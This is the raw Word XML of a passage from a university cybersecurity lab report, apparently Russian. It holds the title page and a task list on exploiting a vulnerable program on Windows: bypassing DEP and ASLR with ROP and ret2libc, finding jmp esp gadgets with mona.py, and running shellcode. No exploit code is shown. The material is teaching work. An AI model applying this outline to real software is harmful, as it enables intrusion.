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881F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2091C516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3429CD6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7D8767EC" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRPr="00E25F81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24D1E215" w14:textId="5110BDD5" w:rsidR="00E25F81" w:rsidRPr="009627BF" w:rsidRDefault="00E25F81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b/>
          <w:bCs/>
          <w:spacing w:val="62"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Высшая школа кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAD30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0A6F7F8E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27D184A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4419C771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2C051DEF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5B5A122B" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2977EC3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8AEBA39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622B0348" w14:textId="2298FCD8" w:rsidR="00F3102D" w:rsidRPr="00E25F81" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:caps/>
          <w:lang w:val="en-US"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</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2729D49F" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="62"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F918B2" w14:textId="086C4675" w:rsidR="00F3102D" w:rsidRPr="00943A11" w:rsidRDefault="00F3102D" w:rsidP="00943A11">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="-143" w:firstLine="142"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943A11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00943A11" w:rsidRPr="00943A11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Исследование подходов, применяемых при эксплуатации уязвимостей</w:t>
      </w:r>
      <w:r w:rsidRPr="00943A11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30353FEE" w14:textId="167B91A9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B38E5" w:rsidRPr="00943A11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Модели безопасности компьютерных систем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E24A15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5540B915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2F092FF9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0E823907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34D285A7" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:ind w:right="-2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5E35C8" w14:textId="2EEBA7D4" w:rsidR="00F3102D" w:rsidRDefault="00EB38E5" w:rsidP="0035662C">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="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Выполнил</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841F287" w14:textId="1822084B" w:rsidR="00F3102D" w:rsidRDefault="00EB38E5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студент</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> гр. 51</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1001/</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="000979F6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Кудряшов </w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>А.</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Д</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5501F9B6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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D59EB2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6935FBDC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570C2806" w14:textId="4B5767D4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Пр</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>еподаватель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E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Овасапян</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Т</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Д</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086846C0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i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;подпись&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EDBB0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76" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEEC1A8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58883840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7CE2D094" w14:textId="34322B64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3B77D30" w14:textId="33A2A323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159484A" w14:textId="1000B7F9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69E8707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2468BC19" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960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6104C826" w14:textId="7E125D7A" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21990AC9" w14:textId="77777777" w:rsidR="00943A11" w:rsidRDefault="00943A11" w:rsidP="0035662C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7F3512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E23B029" w14:textId="27AE04B4" w:rsidR="00F3102D" w:rsidRDefault="00EB38E5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25F81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2E10C" w14:textId="77777777" w:rsidR="006E3D3D" w:rsidRPr="006426CC" w:rsidRDefault="006E3D3D" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006426CC">
        <w:lastRenderedPageBreak/>
        <w:t>цель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3357B6" w14:textId="2196DC41" w:rsidR="006E3D3D" w:rsidRDefault="006E3D3D" w:rsidP="00EB38E5">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы - </w:t>
      </w:r>
      <w:r w:rsidR="00943A11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>изучить способы</w:t>
      </w:r>
      <w:r w:rsidR="00943A11" w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> эксплуатации</w:t>
      </w:r>
      <w:r w:rsidR="00943A11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимостей и механизмов противодействия</w:t>
      </w:r>
      <w:r w:rsidRPr="007744EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE14A63" w14:textId="59F72D9A" w:rsidR="000D7F1F" w:rsidRDefault="000D7F1F" w:rsidP="00E25F81">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA72582" w14:textId="44C8D407" w:rsidR="00E25F81" w:rsidRPr="006426CC" w:rsidRDefault="006E3D3D" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006426CC">
        <w:t>задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54090986" w14:textId="77777777" w:rsidR="00E25F81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>Использовать полученные от преподавателя файлы для лабораторной работы №1 в соответствии со своим вариантом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF438D" w14:textId="77777777" w:rsidR="00E25F81" w:rsidRPr="00EA0496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 w:rsidRPr="004129B2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Получить вариант задания, в котором описан функционал полезной нагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F6B50" w14:textId="77777777" w:rsidR="00E25F81" w:rsidRPr="0073513D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>Изучить защитные механизмы, затрудняющие эксплуатацию уязвимостей (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="0073513D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="0073513D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GS</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37478">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37478">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37478">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, SAFESEH, SEHOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14B5E7" w14:textId="77777777" w:rsidR="00E25F81" w:rsidRPr="0073513D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>Изучить техники эксплуатации уязвимостей и способы обхода защитных механизмов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pivoting</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B933098" w14:textId="77777777" w:rsidR="00E25F81" w:rsidRPr="009D3964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 xml:space="preserve">Используя скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80F59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py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> для отладчиков </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="0048093C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="00644E56">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B80F59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>или другой с аналогичной функциональностью осуществить получение списка загруженных в процесс модулей, не использующих технологию рандомизации адресов. Реализовать скрипт для отладчика</w:t>
      </w:r>
      <w:r w:rsidRPr="0048093C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBEA3F" w14:textId="77777777" w:rsidR="00E25F81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 xml:space="preserve">Найти в динамических библиотеках без рандомизации адресов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>опкоды</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> инструкций, необходимых для передачи управления (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="001716AE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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001716AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001716AE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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, …)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1F22">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>на полезную нагрузку. Реализовать для этих целей скрипт для отладчика (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="0048093C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="00644E56">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A6644">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6644">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0030033A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C16411D" w14:textId="77777777" w:rsidR="00E25F81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>Провести эксплуатацию найденной уязвимости, с использованием полезной нагрузки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) в соответствии с выданным вариантом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37F19F" w14:textId="455164D8" w:rsidR="00E25F81" w:rsidRPr="00E25F81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 w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Эксплуатацию уязвимости осуществлять под ОС семейства </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> версии не ниже </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1582">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>При эксплуатации запрещ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ено изменение исполняемого файла, запуск сторонних исполняемых файлов, либо выполнение консольных команд</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Полезная нагрузка должна быть написана на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">языке ассемблера, либо на языке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00342F84">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">с использованием приемом разработки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
